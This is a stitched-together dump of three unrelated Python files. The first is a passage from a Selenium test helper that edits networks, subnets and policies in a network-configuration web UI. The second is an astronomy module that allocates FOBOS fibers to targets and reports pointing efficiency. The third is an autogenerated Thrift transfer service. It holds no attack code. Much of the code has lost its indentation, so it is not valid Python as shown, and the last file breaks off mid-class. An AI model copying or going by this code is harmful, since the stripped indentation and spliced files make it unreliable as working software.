regexp = "Shared.*Floating"
flag = False
elif search_key == 'DNS':
regexp = "DNS Server\(s\)(.*)Ecmp"
flag = False
elif search_key == 'FIP':
regexp = "Floating IP Pool\(s\)(.*)Route"
flag = False
elif search_key == 'RT':
regexp = "Route Target\(s\)(.*)Export"
flag = False
elif search_key == 'ERT':
regexp = "Export Route Target\(s\)(.*)Import"
flag = False
elif search_key == 'IRT':
regexp = "Import Route Target\(s\)(.*)"
flag = False
out = re.search(regexp,join_res)
if flag:
result = out.group(1)
else:
result = out.group(0)
return result
# get_vn_detail_ui
def edit_remove_option(self, option, category, vn_name=None):
        self.option = option
        index = 0
        result = True
try:
if self.option == "Networks":
self.logger.info("Go to Configure->Networking->Networks page")
if not self.click_configure_networks():
result = result and False
elif self.option == "Ports":
if not self.click_configure_ports():
result = result and False
rows = self.get_rows(canvas=True)
if rows:
self.logger.info("%d rows are there under %s " % (len(rows),self.option))
self.logger.info("%s are available to edit. Editing the %s" % (option,option))
if vn_name:
for row in rows:
out = re.search(vn_name, str(row.text))
index += 1
if out:
break
else:
index = len(rows)
if len(rows):
self.wait_till_ajax_done(self.browser)
self.click_icon_cog(rows[index-1], self.browser, category, option)
else:
self.logger.error("No %s are available to edit" % (option))
self.screenshot(option)
self.wait_till_ajax_done(self.browser)
result = index
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_remove_option
def edit_vn_without_change(self):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
try:
self.logger.info("Click on save button")
self.click_element('configure-networkbtn1')
except WebDriverException:
self.logger.error("Error while trying to save %s" %(option))
result = result and False
self.screenshot(option)
self.click_on_cancel_if_failure('cancelBtn')
raise
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_without_change
def edit_vn_disp_name_change(self, vn_name):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
self.click_element('display_name')
self.send_keys(vn_name, 'span12', 'class', clear=True)
self.click_element('configure-networkbtn1')
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_disp_name_change
def add_vn_with_policy(self,pol_name):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
self.click_element('s2id_network_policy_refs_dropdown')
select_highlight = "//li[contains(@class,'select2-highlighted')]"
select = self.find_element(select_highlight, 'xpath')
pol_name = select.text
select.click()
self.click_element('configure-networkbtn1')
return pol_name
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# add_vn_with_policy
def del_vn_with_policy(self,pol_name):
result = True
option = "Networks"
try:
policy_ui = str(self.get_vn_detail_ui('Policy'))
policy = pol_name.split(":")
out = re.search(policy[-1],policy_ui)
if out:
index = 1
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
del_row = self.find_element('s2id_network_policy_refs_dropdown')
count = 0
if index > 0:
close_option = "//a[contains(@class,'select2-search-choice-close')]"
for element in self.find_element(close_option, 'xpath', elements=True):
count = count + 1
if count == index:
element.click()
self.logger.info("Policy got removed successfully")
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
else:
self.logger.warn("There is no policy to edit")
else:
self.logger.error("Clicking the edit button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# del_vn_with_policy
def edit_vn_with_subnet(self, category, subnet, dfrange, dfgate, vn):
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit', vn_name=vn)
if self.edit_vn_result:
self.wait_till_ajax_done(self.browser)
self.click_element('ui-accordion-subnets-header-0')
self.wait_till_ajax_done(self.browser)
self.click_element('icon-plus', 'class')
data_row = "//tr[contains(@class,'data-row')]"
data = self.find_element(data_row, 'xpath', elements=True)
data_new = []
for item in data:
if item == '':
pass
else:
data_new.append(item)
data_len = len(data_new)
ipam = self.find_element('s2id_user_created_ipam_fqn_dropdown', elements=True)
            if data_len > 3:
                index = data_len - 3
            elif data_len > 1 and data_len <= 3:
                index = data_len - 1
            else:
                index = 0
cidr_option = "//input[contains(@name,'user_created_cidr')]"
self.send_keys(subnet, cidr_option, 'xpath', clear=True, if_elements=[index])
allocation_pool = "//textarea[contains(@name,'allocation_pools')]"
self.send_keys(dfrange, allocation_pool, 'xpath', clear=True, if_elements=[index])
if category == 'Subnet':
default_gateway = "//input[contains(@name,'default_gateway')]"
self.send_keys(dfgate, default_gateway, 'xpath', \
clear=True, if_elements=[index])
elif category == 'Subnet-gate':
gateway_option = "//input[contains(@name,'user_created_enable_gateway')]"
self.click_element(gateway_option, 'xpath', elements=True, index=index)
elif category == 'Subnet-dns':
dns_option = "//input[contains(@name,'user_created_enable_dns')]"
self.click_element(dns_option, 'xpath', elements=True, index=index)
elif category == 'Subnet-dhcp':
dhcp_option = "//input[contains(@name,'enable_dhcp')]"
self.click_element(dhcp_option, 'xpath', elements=True, index=index)
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
result = self.edit_vn_result
else:
self.logger.error("Clicking the Edit Button is not working")
result = False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_with_subnet
def del_vn_with_subnet(self, vn):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit', vn_name=vn)
if self.edit_vn_result:
self.click_element('ui-accordion-subnets-header-0')
self.wait_till_ajax_done(self.browser)
data_row = "//tr[contains(@class,'data-row')]"
data = self.find_element(data_row, 'xpath', elements=True)
ind = 0
act_cell = self.find_element('action-cell', 'class')
minus_icon = "//i[contains(@class,'icon-minus')]"
self.click_element(minus_icon, 'xpath', elements=True, index=ind)
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# del_vn_with_subnet
def edit_vn_with_host_route(self, button, tc, hprefix, hnexthop):
result = True
option = "Networks"
try:
self.edit_vn_result = self.edit_remove_option(option, 'edit')
if self.edit_vn_result:
self.click_element('host_routes')
self.wait_till_ajax_done(self.browser)
if button == 'add':
edit_grid = "//a[contains(@class,'editable-grid-add-link')]"
add_link = self.find_element(edit_grid, 'xpath', elements=True)
add_link[1].click()
prefix = "//input[contains(@name,'prefix')]"
self.send_keys(hprefix, prefix, 'xpath')
next_hop = "//input[contains(@name,'next_hop')]"
self.send_keys(hnexthop, next_hop, 'xpath')
else:
minus_icon = "//i[contains(@class,'icon-minus')]"
minus = self.find_element(minus_icon, 'xpath', elements=True)
index = len(minus)
minus[index-1].click()
self.click_element('configure-networkbtn1')
self.wait_till_ajax_done(self.browser)
if tc == 'neg':
warn_button_host_route = "//span[contains(@data-bind,'hostRoutes')]"
warn_button = self.find_element(warn_button_host_route, 'xpath')
if warn_button.get_attribute('style') == "":
self.click_on_cancel_if_failure('cancelBtn')
self.wait_till_ajax_done(self.browser)
return result
else:
result = result and False
else:
self.logger.error("Clicking the Edit Button is not working")
result = result and False
except WebDriverException:
self.logger.error("Error while trying to edit %s" % (option))
self.screenshot(option)
result = result and False
self.click_on_cancel_if_failure('cancelBtn')
raise
return result
# edit_vn_with_host_route
def edit_vn_with_adv_option(self, category, tc, var_list):
option = "Networks"
try:
self.wait_till_ajax_done(self.browser)
if not self.click_configure_networks():
result = False
if category == 1:
add_icon = "//i[contains(@class,'icon-plus')]"
self.click_element(add_icon, 'xpath')
disp_name = "//input[contains(@name,'display_name')]"
self.send_keys(var_list[3], disp_name, 'xpath')
self.click_element('ui-accordion-subnets-header-0')
self.click_element("icon-plus", 'class')
cidr = "//input[contains(@name,'user_created_cidr')]"
<reponame>Keck-FOBOS/producer
"""
Construct a set of observations by allocating apertures (fibers) to targets.
Contains code originally written by 2021 Akamai intern, <NAME>.
.. include:: ../include/links.rst
"""
import io
import sys
import time
import warnings
from pathlib import Path
from configparser import ConfigParser
from IPython import embed
import numpy
from astropy import table
from .deploy import FOBOSApertures
from .allocate import assign_apertures
from .targets import parse_targets
# TODO:
# - Set fraction to assign to sky
# - Write method that assigns sky fibers, guide bundles, calibration
# bundles
def configure_observations(objx, objy, aptype, mode=None, max_nobs=None):
"""
Construct a series of observations to observe a set of targets with
a fixed field center.
Args:
objx (`numpy.ndarray`_):
Cartesian x coordinate in tangent plane projection of object
coordinates relative to the pointing center. Shape must be
1D and match ``objy``.
objy (`numpy.ndarray`_):
Cartesian y coordinate in tangent plane projection of object
coordinates relative to the pointing center. Shape must be
1D and match ``objx``.
aptype (:obj:`int`, `numpy.ndarray`_):
The aperture type for each object. Can provide a single
integer for all targets or an aperture type for each object.
The aperture type must be 0 for a single-fiber aperture or 1
for a 37-fiber IFU.
mode (:obj:`int`, array-like, optional):
The mode assignment for each spectrograph. Can be 0 to turn
off all apertures for a given spectrograph, but otherwise
must be 1 for the single-fiber apertures, 2 for multi-IFU
mode, or 3 for monolithic IFU mode. If a single integer,
all spectrographs are put in the same mode; otherwise must
provide the mode for each of the 3 spectrographs separately.
max_nobs (:obj:`int`, optional):
Impose a maximum number of observations to configure. If None,
observations will be configured until no more objects are within the
field of view.
    Returns:
        :obj:`tuple`: The number of targets within the field of view, followed by
        four lists with one element per configured observation: the assigned
        object IDs, the number of available apertures, the assigned aperture
        IDs, and the spectrograph mode.
"""
# Check input
if objx.ndim > 1:
raise ValueError('Input coordinate arrays must be 1D.')
if objy.shape != objx.shape:
raise ValueError('Input coordinate arrays must have the same shape.')
nobj = objx.size
_aptype = numpy.atleast_1d(aptype)
if _aptype.size == 1:
_aptype = numpy.full(nobj, aptype, dtype=int)
if _aptype.shape != objx.shape:
raise ValueError('For per-object aperture types, must have same shape as coordinates.')
if not numpy.all(numpy.isin(_aptype, [0,1])):
        raise ValueError('Aperture types must be 0 (single-fiber) or 1 (IFU).')
# If mode is None, first try to set it based on the aperture types
if mode is None:
if numpy.all(_aptype == 0):
            # All apertures are in single-fiber mode, so set the
            # instrument configuration accordingly
mode = 1
elif numpy.all(_aptype == 1):
            # All apertures are in IFU mode, so set the instrument
            # configuration accordingly
mode = 2
# If mode is still None, that means there is a mix of IFU and
# single-fiber targets, and we need to find the best of 6 possible
# mixed-mode configurations
if mode is None:
raise NotImplementedError('Cannot yet determine best mixed mode configuration.')
# Setup the apertures
ap = FOBOSApertures(mode=mode)
# Objects to track assigned object and aperture IDs for each
# observation
obs_obj = []
obs_ap = []
obs_nap = []
obs_mode = []
_objx = objx.copy()
_objy = objy.copy()
    _aptype = _aptype.copy()
obj_id = numpy.arange(nobj, dtype=int)
# Get the aperture ID, coordinates, and payload type
ap_id = ap.id.copy()
apx, apy = ap.coo.T.copy()
payload = ap.payload.copy()
# TODO: This can be moved inside the loop
    # Select the science apertures
ap_indx = ap.select('science')
# Total number of objects within the field-of-view
n_in_fov = numpy.sum(objx**2 + objy**2 < (ap.fov*60/2)**2)
    # Iteratively construct observations, each assigning as many apertures to
    # targets as possible, until no more targets can be observed.
niter = 0
while _objx.size > 0 and (max_nobs is None or niter < max_nobs):
# TODO: This ordering means single fibers are given priority
# over IFUs
_a_obj = None
_a_ap = None
# Only consider those objects in the field of view
in_fov = _objx**2 + _objy**2 < (ap.fov*60/2)**2
# Assign the single-fiber apertures to appropriate targets
use_obj = (_aptype == 0) & in_fov
use_ap = (payload == 0) & ap_indx
_nap = numpy.sum(use_ap)
if numpy.any(use_obj) and numpy.any(use_ap):
_a_obj, _a_ap = assign_apertures(_objx, _objy, apx, apy,
ignore_obj=numpy.where(numpy.logical_not(use_obj))[0],
ignore_ap=numpy.where(numpy.logical_not(use_ap))[0])
if _a_obj.size == 0:
_a_obj = None
_a_ap = None
# Assign the IFU apertures to appropriate targets
use_obj = (_aptype == 1) & in_fov
use_ap = (payload == 1) & ap_indx
_nap += numpy.sum(use_ap)
if numpy.any(use_obj) and numpy.any(use_ap):
_ifu_obj, _ifu_ap \
= assign_apertures(_objx, _objy, apx, apy,
ignore_obj=numpy.where(numpy.logical_not(use_obj))[0],
ignore_ap=numpy.where(numpy.logical_not(use_ap))[0],
allocated_obj=_a_obj, allocated_ap=_a_ap)
if _ifu_obj.size > 0:
_a_obj = numpy.append(_a_obj, _ifu_obj)
_a_ap = numpy.append(_a_ap, _ifu_ap)
if _a_obj is None or _a_obj.size == 0:
# No apertures could be assigned so we're done!
break
# Add the object IDs, aperture IDs, and spectrograph mode for
# this observation
obs_obj += [obj_id[_a_obj]]
obs_nap += [_nap]
obs_ap += [ap_id[_a_ap]]
obs_mode += [ap.mode]
# Remove the assigned objects from those available in the next
# iteration
_objx = numpy.delete(_objx, _a_obj)
_objy = numpy.delete(_objy, _a_obj)
_aptype = numpy.delete(_aptype, _a_obj)
obj_id = numpy.delete(obj_id, _a_obj)
niter += 1
return n_in_fov, obs_obj, obs_nap, obs_ap, obs_mode
def report_configurations(n_in_fov, obs_obj, obs_nap, obs_ap, obs_mode):
"""
Construct a report of the observation configurations.
"""
tab = table.Table()
# Number of observations
nobs = len(obs_obj)
# Pointing number
tab['Pointing'] = numpy.arange(nobs)+1
# Number of available apertures in each observation
tab['Avail'] = numpy.array(obs_nap)
# Number of allocations in each observation
tab['Alloc'] = numpy.array([len(o) for o in obs_obj])
    # Cumulative fraction of the in-field targets observed so far (completeness)
tab['Compl'] = numpy.cumsum(tab['Alloc'])/n_in_fov
tab['Compl'].format = '.4f'
# Fraction of all apertures assigned
tab['Eff'] = tab['Alloc']/tab['Avail']
tab['Eff'].format = '.4f'
# Mean fraction of assigned apertures for this and all previous observations
tab['MeanEff'] = numpy.cumsum(tab['Eff'])/(numpy.arange(nobs)+1)
tab['MeanEff'].format = '.4f'
print(f'Total number of targets available: {n_in_fov}')
print(f'Total number of pointings: {nobs}')
print('')
tab.write(sys.stdout, format='ascii.fixed_width_two_line', delimiter=' ')
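
# Hedged usage sketch (not part of the original module): configure pointings for
# a synthetic, single-fiber-only target list and print the allocation report.
# The field half-width, target count, and seed below are illustrative assumptions.
def _example_configure_and_report(n_targets=500, half_width_arcsec=600.0, seed=42):
    rng = numpy.random.default_rng(seed)
    # Uniform scatter of targets (arcsec offsets from the pointing center)
    objx = rng.uniform(-half_width_arcsec, half_width_arcsec, n_targets)
    objy = rng.uniform(-half_width_arcsec, half_width_arcsec, n_targets)
    n_in_fov, obs_obj, obs_nap, obs_ap, obs_mode \
            = configure_observations(objx, objy, 0, max_nobs=3)
    report_configurations(n_in_fov, obs_obj, obs_nap, obs_ap, obs_mode)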
def write_configurations(root, ra, dec, center, obs_obj, obs_ap, obs_mode, objid=None, path=None,
ndig=None, tight=False, target_file=None, ra_c=None, dec_c=None):
"""
Write a set of configuration files for each FOBOS observation.
Args:
root (:obj:`str`):
The root name for all output files.
ra (`numpy.ndarray`_):
Right ascension coordinates for all considered objects.
dec (`numpy.ndarray`_):
Declination coordinates for all considered objects. Shape must
match ``ra``.
center (:obj:`tuple`):
RA and DEC coordinates for the FOBOS pointing center.
obs_obj (:obj:`list`):
List of `numpy.ndarray`_ objects identifying the indices of the
objects observed from the provided list of coordinates. The number
of items in the list sets the number of revisits to the same
pointing. This is the same as the second object returned by
:func:`~producer.plan.configure_observations`.
obs_ap (:obj:`list`):
List of `numpy.ndarray`_ objects identifying the indices of the
FOBOS apertures used for each object observed. List length must
match ``obs_obj``. This is the same as the fourth object returned
by :func:`~producer.plan.configure_observations`. The aperture
indices must match indices when instantiating a
:class:`~producer.deploy.FOBOSApertures` object in the specified
mode (``obs_mode``).
obs_mode (:obj:`list`):
List of `numpy.ndarray`_ objects identifying the FOBOS mode; see
:class:`~producer.deploy.FOBOSApertures`. List length must match
``obs_obj``. This is the same as the last object returned by
:func:`~producer.plan.configure_observations`.
objid (`numpy.ndarray`_, optional):
An array with identifiers for each object. Each array element must
convert directly to a string. Uniqueness is not checked. Shape
must match ``ra``. If None, just set to the 0-indexed array index.
path (:obj:`str`, optional):
Root path for all output files. If None, either set to the parent
path provided by ``root`` or set to the current directory.
ndig (:obj:`int`, optional):
Number of digits to use for the observation number in the output
file names. If None, this is set by the number of configurations to
write. E.g., 9 observations or less yield ``ndig=1``, 10-99
observations yield ``ndig=2``, etc.
tight (:obj:`bool`, optional):
Output the configuration in "tight" format, where unallocated
apertures are not included.
target_file (:obj:`str`, optional):
Name of the file with the original targets. If provided, will be
included in header of output configuration files.
ra_c (:obj:`int`, optional):
1-indexed column number with the RA coordinates in ``target_file``.
Ignored if ``target_file`` is None.
dec_c (:obj:`int`, optional):
1-indexed column number with the DEC coordinates in ``target_file``.
            Ignored if ``target_file`` is None.
<filename>Middleware/Thrift-homework/src/main/py/gen_py/transfer/Transfer.py
#
# Autogenerated by Thrift Compiler (0.14.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def transferList(self, data):
"""
Parameters:
- data
"""
pass
def transferSet(self, data):
"""
Parameters:
- data
"""
pass
def transferMap(self, data):
"""
Parameters:
- data
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def transferList(self, data):
"""
Parameters:
- data
"""
self.send_transferList(data)
return self.recv_transferList()
def send_transferList(self, data):
self._oprot.writeMessageBegin('transferList', TMessageType.CALL, self._seqid)
args = transferList_args()
args.data = data
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transferList(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transferList_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transferList failed: unknown result")
def transferSet(self, data):
"""
Parameters:
- data
"""
self.send_transferSet(data)
return self.recv_transferSet()
def send_transferSet(self, data):
self._oprot.writeMessageBegin('transferSet', TMessageType.CALL, self._seqid)
args = transferSet_args()
args.data = data
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transferSet(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transferSet_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transferSet failed: unknown result")
def transferMap(self, data):
"""
Parameters:
- data
"""
self.send_transferMap(data)
return self.recv_transferMap()
def send_transferMap(self, data):
self._oprot.writeMessageBegin('transferMap', TMessageType.CALL, self._seqid)
args = transferMap_args()
args.data = data
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_transferMap(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = transferMap_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "transferMap failed: unknown result")
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["transferList"] = Processor.process_transferList
self._processMap["transferSet"] = Processor.process_transferSet
self._processMap["transferMap"] = Processor.process_transferMap
self._on_message_begin = None
def on_message_begin(self, func):
self._on_message_begin = func
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if self._on_message_begin:
self._on_message_begin(name, type, seqid)
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_transferList(self, seqid, iprot, oprot):
args = transferList_args()
args.read(iprot)
iprot.readMessageEnd()
result = transferList_result()
try:
result.success = self._handler.transferList(args.data)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transferList", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_transferSet(self, seqid, iprot, oprot):
args = transferSet_args()
args.read(iprot)
iprot.readMessageEnd()
result = transferSet_result()
try:
result.success = self._handler.transferSet(args.data)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transferSet", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_transferMap(self, seqid, iprot, oprot):
args = transferMap_args()
args.read(iprot)
iprot.readMessageEnd()
result = transferMap_result()
try:
result.success = self._handler.transferMap(args.data)
msg_type = TMessageType.REPLY
except TTransport.TTransportException:
raise
except TApplicationException as ex:
logging.exception('TApplication exception in handler')
msg_type = TMessageType.EXCEPTION
result = ex
except Exception:
logging.exception('Unexpected exception in handler')
msg_type = TMessageType.EXCEPTION
result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
oprot.writeMessageBegin("transferMap", msg_type, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
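
# Hedged usage sketch (not emitted by the Thrift compiler): a minimal handler
# plus a simple blocking server wired to the generated Processor. The handler
# logic and port are illustrative placeholders.
def _example_transfer_server(port=9090):
    from thrift.transport import TSocket
    from thrift.protocol import TBinaryProtocol
    from thrift.server import TServer
    class TransferHandler(Iface):
        def transferList(self, data):
            return sum(data)
        def transferSet(self, data):
            return sum(data)
        def transferMap(self, data):
            return sum(data.values())
    server = TServer.TSimpleServer(Processor(TransferHandler()),
                                   TSocket.TServerSocket(port=port),
                                   TTransport.TBufferedTransportFactory(),
                                   TBinaryProtocol.TBinaryProtocolFactory())
    server.serve()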
# HELPER FUNCTIONS AND STRUCTURES
class transferList_args(object):
"""
Attributes:
- data
"""
def __init__(self, data=None,):
self.data = data
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.data = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = iprot.readI32()
self.data.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferList_args')
if self.data is not None:
oprot.writeFieldBegin('data', TType.LIST, 1)
oprot.writeListBegin(TType.I32, len(self.data))
for iter6 in self.data:
oprot.writeI32(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferList_args)
transferList_args.thrift_spec = (
None, # 0
(1, TType.LIST, 'data', (TType.I32, None, False), None, ), # 1
)
class transferList_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferList_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferList_result)
transferList_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class transferSet_args(object):
"""
Attributes:
- data
"""
def __init__(self, data=None,):
self.data = data
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.SET:
self.data = set()
(_etype10, _size7) = iprot.readSetBegin()
for _i11 in range(_size7):
_elem12 = iprot.readI32()
self.data.add(_elem12)
iprot.readSetEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferSet_args')
if self.data is not None:
oprot.writeFieldBegin('data', TType.SET, 1)
oprot.writeSetBegin(TType.I32, len(self.data))
for iter13 in self.data:
oprot.writeI32(iter13)
oprot.writeSetEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferSet_args)
transferSet_args.thrift_spec = (
None, # 0
(1, TType.SET, 'data', (TType.I32, None, False), None, ), # 1
)
class transferSet_result(object):
"""
Attributes:
- success
"""
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I64:
self.success = iprot.readI64()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
return
oprot.writeStructBegin('transferSet_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I64, 0)
oprot.writeI64(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
all_structs.append(transferSet_result)
transferSet_result.thrift_spec = (
(0, TType.I64, 'success', None, None, ), # 0
)
class transferMap_args(object):
"""
Attributes:
- data
"""
def __init__(self, data=None,):
self.data = data
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
return
iprot.readStructBegin()
while True:
